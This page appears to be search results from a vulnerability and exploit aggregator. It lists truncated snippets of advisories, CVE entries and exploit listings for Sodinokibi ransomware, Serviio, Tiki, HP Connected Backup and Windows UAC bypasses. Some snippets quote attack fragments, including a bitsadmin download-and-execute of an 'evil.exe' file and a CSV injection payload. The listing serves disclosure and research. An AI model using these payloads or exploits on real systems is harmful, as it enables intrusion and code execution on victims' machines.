Lucene search
K

208 matches found

Carbon Black Blog
Carbon Black Blog
added 2019/08/16 6:28 p.m.146 views

CB TAU Threat Intelligence Notification: Sodinokibi Ransomware

Sodinokibi otherwise known as Sodin or REvil is a ransomware variant that has recently been observed evolving its delivery techniques, leveraging fake antivirus software and PowerShell droppers. This malware appears to be related to GandCrab and is likely a result of their operation closing up...

6.5AI score
Exploits0
0day.today
0day.today
added 2019/06/27 12:0 a.m.761 views

Windows/x86 - bitsadmin Download and Execute Shellcode (210 Bytes)

/ ; Windows/x86 - bitsadmin Download and Execute http://192.168.10.10/evil.exe c:\evil.exe Shellcode 210 Bytes ; Shellcode Title : bitsadmin download and execute ; Shellcode Author : Joseph McDonagh ; Date June 26, 2019 ; Shellcode Length 210 ; However, if the application you are exploiting alrea...

0.6AI score
Exploits0
myhack58
myhack58
added 2018/12/25 12:0 a.m.2661 views

A use cve-2017-11882 and cve-2018-0802 combination of vulnerability a malicious document analysis-vulnerability warning-the black bar safety net

! Recently intercepted an extension doc word document to attack the samples, which format is actually RTF format. By analyzing the document composition the use of a cve-2017-11882 and cve-2018-0802 vulnerability, and use the embedded excel object is used to trigger the vulnerability. The release ...

9.3CVSS8.4AI score0.99945EPSS
Exploits36
FireEye
FireEye
added 2018/11/20 5:30 p.m.20 views

Cmd and Conquer: De-DOSfuscation with flare-qdb

When Daniel Bohannon released his excellent DOSfuscation paper, I was fascinated to see how tricks I used as a systems engineer could help attackers evade detection. I didn’t have much to contribute to this conversation until I had to analyze a hideously obfuscated batch file as part of my job on...

7.1AI score
Exploits0References10
Carbon Black Blog
Carbon Black Blog
added 2018/08/27 4:42 p.m.95 views

Threat Analysis: Recent Attack Technique Leveraging cmd.exe and PowerShell Demonstrates How Attackers Are Using Trusted Microsoft Applications for Malicious Behavior

An attack leveraging cmd.exe and PowerShell was recently investigated by Cb ThreatSight analysts. Our initial investigation discovered that a batch file was executed on the targeted system. This batch file then invoked PowerShell with a base64 encoded command. Decoding the command revealed a seri...

Exploits0
OSV
OSV
added 2018/02/21 8:29 p.m.16 views

CVE-2018-7304

Tiki 17.1 does not validate user input for special characters; consequently, a CSV Injection attack can open a CMD.EXE or Calculator window on the victim machine to perform malicious activity, as demonstrated by an "=cmd|' /C calc'!A0" payload during User Creation...

8.8CVSS7.4AI score
Exploits0References1
Cvelist
Cvelist
added 2018/02/21 8:0 p.m.21 views

CVE-2018-7304

Tiki 17.1 does not validate user input for special characters; consequently, a CSV Injection attack can open a CMD.EXE or Calculator window on the victim machine to perform malicious activity, as demonstrated by an "=cmd|' /C calc'!A0" payload during User Creation...

8.9AI score0.01269EPSS
Exploits1References1
CVE
CVE
added 2018/02/21 8:0 p.m.54 views

CVE-2018-7304

CVE-2018-7304 affects Tiki Wiki CMS Groupware (Tiki) version 17.1. The vulnerability arises because the application does not validate user input containing special characters in CSV fields, enabling CSV Injection that can trigger commands on the victim’s machine (for example, an input payload lik...

8.8CVSS8.8AI score0.01269EPSS
Exploits1References1Affected Software1
Exploit DB
Exploit DB
added 2018/01/23 12:0 a.m.36 views

HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation

Tested on HP Connected Backup version 8.8.2.0 on Windows 7 x64 import os import sys import time import requests from bs4 import BeautifulSoup def sendrequestbody: url="http://localhost:16386/" headers = "Content-Type": "text/xml; charset=utf-8", 'SOAPAction': '""', "Set-Cookie":...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2017/12/11 12:0 a.m.58 views

Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution

Summary Serviio is a free media server. It allows you to stream your media files music, video or images to renderer devices e.g. a TV set, Bluray player, games console or mobile phone on your connected home network. Description The version of Serviio installed on the remote Windows host is affect...

8.2AI score
Exploits0
0day.today
0day.today
added 2017/08/22 12:0 a.m.107 views

Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) Exploit

This Metasploit module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entries are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in...

6.8AI score
Exploits0
Metasploit
Metasploit
added 2017/07/31 4:26 a.m.61 views

Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)

This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entries are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated...

7.1AI score
Exploits0
myhack58
myhack58
added 2017/07/24 12:0 a.m.55 views

Source game remote code execution vulnerability analysis-vulnerability warning-the black bar safety net

Valve's Source SDK contains a buffer overflow vulnerability, which results in the client and server can execute arbitrary code. This vulnerability in the shot and the player when triggered, which can lead to load a specific ragdoll modelragdoll model. A plurality of Source game in 2017 6 November...

0.4AI score
Exploits0
Packet Storm
Packet Storm
added 2017/07/17 12:0 a.m.22 views

FTPGetter 5.89.0.85 Buffer Overflow

!/usr/bin/python Exploit Title: FTPGetter 5.89.0.85 Remote SEH Buffer Overflow Date: 07/14/2017 Exploit Author: Paul Purcell Contact: ptpxploit at gmail Vendor Homepage: https://www.ftpgetter.com/ Vulnerable Version Download: Available for 30 days here: https://ufile.io/2celn I can upload again...

0.8AI score
Exploits0
0day.today
0day.today
added 2017/05/17 12:0 a.m.26 views

Serviio Media Server checkStreamUrl Command Execution Exploit

This Metasploit module exploits an unauthenticated remote command execution vulnerability in the console component of Serviio Media Server versions 1.4 to 1.8 on Windows operating systems. The console service on port 23423 by default exposes a REST API which which does not require authentication...

7.5AI score
Exploits0
Exploit DB
Exploit DB
added 2017/05/17 12:0 a.m.25 views

Serviio Media Server - checkStreamUrl Command Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule /Restlet-Framework/ include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initializeinfo = superupdateinfoinfo, 'Name' =...

7.4AI score
Exploits0
Metasploit
Metasploit
added 2017/05/05 7:54 a.m.19 views

Serviio Media Server checkStreamUrl Command Execution

This module exploits an unauthenticated remote command execution vulnerability in the console component of Serviio Media Server versions 1.4 to 1.8 on Windows operating systems. The console service on port 23423 by default exposes a REST API which which does not require authentication. The 'actio...

1.3AI score
Exploits0
0day.today
0day.today
added 2017/05/04 12:0 a.m.54 views

Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution Exploit

Serviio PRO DLNA Media Streaming Server version 1.8.0.0 PRO, 1.7.1, 1.7.0, and 1.6.1 suffers from a REST API arbitrary code execution vulnerability. !/usr/bin/env python Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution Vendor: Petr Nejedly | Six Lines Ltd Product web...

7.9AI score
Exploits0
Exploit DB
Exploit DB
added 2017/05/03 12:0 a.m.76 views

Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution

!/usr/bin/env python Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution Vendor: Petr Nejedly | Six Lines Ltd Product web page: http://www.serviio.org Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1 Summary: Serviio is a free media server. It allows you to stream your...

7.4AI score
Exploits0
0day.today
0day.today
added 2017/04/18 12:0 a.m.34 views

Microsoft Windows taskschd.msc Privilege Escalation Vulnerability

Microsoft Windows taskschd.msc local SYSTEM privilege escalation exploit. Microsoft Windows 'taskschd.msc' Local SYSTEM Privilege Escalation Todor Donev https://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg Disclaimer: This or previous programs is for Educational purpose ONLY...

7.1AI score
Exploits0
Rows per page
Query Builder